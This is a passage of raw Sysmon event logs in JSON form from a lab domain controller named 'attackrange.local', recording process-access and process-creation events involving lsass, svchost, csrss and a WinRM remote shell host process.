tdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8455,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.740\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.740","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8456,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.740\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.740","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8457,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.754\r\nProcessGuid: {41C8662E-22D1-5F25-0000-00100BAD1100}\r\nProcessId: 1348\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-22D1-5F25-0000-00205EAC1100}\r\nLogonId: 0x11AC5E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.754","ProcessGuid":"{41C8662E-22D1-5F25-0000-00100BAD1100}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-22D1-5F25-0000-00205EAC1100}","LogonId":"0x11ac5e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{41C8662E-1F63-5F25-0000-0010C3650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8458,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-001039291100}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-001039291100}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8459,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.740\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-001039291100}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.740","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-001039291100}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8460,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8461,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8462,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8463,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 